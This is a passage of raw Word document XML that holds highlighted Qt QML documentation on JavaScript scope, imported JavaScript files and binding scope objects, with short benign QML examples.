        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</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QtObject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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</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a</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a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12</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a</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524E68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Every JavaScript expression, function or file in QML has its own unique variable object.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Local variables declared in one will never conflict with local variables declared in another</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="008D55B3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="521" w:name="type-names-and-imported-javascript-files"/>
      <w:bookmarkStart w:id="522" w:name="_Toc483000642"/>
      <w:bookmarkStart w:id="523" w:name="_Toc483003659"/>
      <w:bookmarkStart w:id="524" w:name="_Toc483603995"/>
      <w:bookmarkStart w:id="525" w:name="_Toc483605215"/>
      <w:bookmarkEnd w:id="521"/>
      <w:r w:rsidRPr="008D55B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Type Names and Imported JavaScript Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
      <w:bookmarkEnd w:id="523"/>
      <w:bookmarkEnd w:id="524"/>
      <w:bookmarkEnd w:id="525"/>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00490E7E" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId402" w:history="1">
        <w:r w:rsidR="00F3106D" w:rsidRPr="00524E68">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Documents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00524E68">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00524E68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>include import statements</w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that define the type names and JavaScript files visible to the document. In addition to their use in the QML declaration itself, </w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00524E68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type names</w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used by JavaScript code when accessing</w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId403" w:anchor="attached-properties-and-attached-signal-handlers" w:history="1">
        <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attached properties</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00F3106D" w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and enumeration values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The effect of an import applies to every property binding, and JavaScript function in the QML document, even those in nested inline components. The following example shows </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a simple QML file that accesses some enumeration values and calls an imported JavaScript function.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="007F5E0C" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"code.js"</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code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ListView</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snapMode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ListView</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SnapToItem</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delegate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Component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Text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elide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Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ElideMiddle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text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"A really, really long string that will require eliding."</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color</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Code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defaultColor</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="007F5E0C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="526" w:name="binding-scope-object"/>
      <w:bookmarkStart w:id="527" w:name="_Toc483000643"/>
      <w:bookmarkStart w:id="528" w:name="_Toc483003660"/>
      <w:bookmarkStart w:id="529" w:name="_Toc483603996"/>
      <w:bookmarkStart w:id="530" w:name="_Toc483605216"/>
      <w:bookmarkEnd w:id="526"/>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding Scope Object</w:t>
      </w:r>
      <w:bookmarkEnd w:id="527"/>
      <w:bookmarkEnd w:id="528"/>
      <w:bookmarkEnd w:id="529"/>
      <w:bookmarkEnd w:id="530"/>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F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object which has a</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5E0C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId404" w:history="1">
        <w:r w:rsidRPr="007F5E0C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property binding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binding's</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scope object</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In the following example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId405" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object is the binding's scope object.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Item</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anchors</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left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parent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left</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00F3106D" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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7F5E0C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bindings have access to the scope object's properties without </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qualification</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In the previous example, the binding accesses the</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId406" w:history="1">
        <w:r w:rsidRPr="00F3106D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'s</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parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3106D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property directly, without needing any form of object prefix. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML introduces a more structured, object-oriented approach to JavaScript, and consequently does not require the use of the JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3106D" w:rsidRPr="00AD4003" w:rsidRDefault="00F3106D" w:rsidP="00F3106D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Care must be used when accessing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4003">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId407" w:anchor="attached-properties-and-attached-signal-handlers" w:history="1">
        <w:r w:rsidRPr="00AD4003">
          <w:rPr>
            <w:rStyle w:val="a3"/>
